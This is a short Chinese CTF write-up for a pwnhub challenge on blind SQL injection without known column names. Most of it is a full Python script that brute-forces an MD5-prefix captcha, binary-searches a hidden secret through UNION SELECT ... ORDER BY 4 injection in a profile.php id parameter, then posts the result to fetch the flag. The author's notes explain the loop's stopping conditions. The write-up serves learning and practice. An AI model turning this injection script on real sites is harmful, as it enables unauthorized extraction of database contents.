pwnhub二分法无列名盲注

这道题限制了SQL注入的次数为140次内,并且要求注入未知列名的一列的数据,从源码里可以得知该列在第四列.

可以通过这样的盲注来猜解数据:

但是我不会写二分法的脚本🙃

学习了小伙伴的脚本,自己又摸了一遍,才搞清楚.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#! /usr/bin/env python3
# Author : sn00py
# Date : 2017/10/28 14:22
# Email: 3022235906@qq.com
# Comment: 二分盲注 for pwnhub
import requests
import hashlib
import re
def brute_captcha():
url = target + '/flag.php'
session = requests.session()
res = session.get(url, cookies=cookies)
captcha = re.search(r"substr\(md5\(captcha\), 0, 4\)=(.{4})", res.text).group(1)
print('当前$_SESSION[\'captcha\']:', captcha)
for i in range(1000000):
m = hashlib.md5()
m.update(str(i).encode('utf8'))
tmp_captcha = m.hexdigest()[:4]
if tmp_captcha == captcha:
captcha = str(i)
print('爆破成功:', captcha)
return captcha
def sqli_duihuanma():
string = '0123456789abcdefghijklmnopqrstuvwxyz'
str = ''
i = 1
times = 0
while i <= 36:
if len(string) == 1:
str += string
return str
left = 0
right = len(string) - 1
while 1:
times += 1
mid = int((left + right) / 2)
url = target + "/profile.php?id=1 union select 1,'no',3,'%s%s',5 order by 4 limit 0,1" % (str, string[mid])
res = requests.get(url, cookies=cookies)
if 'admin' in res.text:
right = mid - 1
else:
left = mid
if left == right:
str += string[left]
string = string.replace(string[left], '')
break
if right == left + 1:
url = target + "/profile.php?id=1 union select 1,'no',3,'%s%s',5 order by 4 limit 0,1" % (str, string[right])
res = requests.get(url)
if 'admin' in res.text:
str += string[left]
string = string.replace(string[left], '')
break
else:
str += string[right]
string = string.replace(string[right], '')
break
print('第%s次, secret:%s' % (times, str))
i += 1
def get_flag():
url = target + '/flag.php'
data = {'duihuanma': duihuanma, 'captcha': captcha}
res = requests.post(url, data=data, cookies=cookies)
flag = re.search(r"(flag{.+})", res.text).group(0)
print(flag)
if __name__ == '__main__':
target = 'http://127.0.0.1/hub/'
cookies = {"PHPSESSID": "72ion1p34vsppq9rpe38vd6hh6"}
captcha = brute_captcha()
duihuanma = sqli_duihuanma()
get_flag()

主要是当时自己不会找临界条件,不知道什么时候break.

  • 临界条件1: 上下限相等的时候
  • 临界调减2: 上下限差1的时候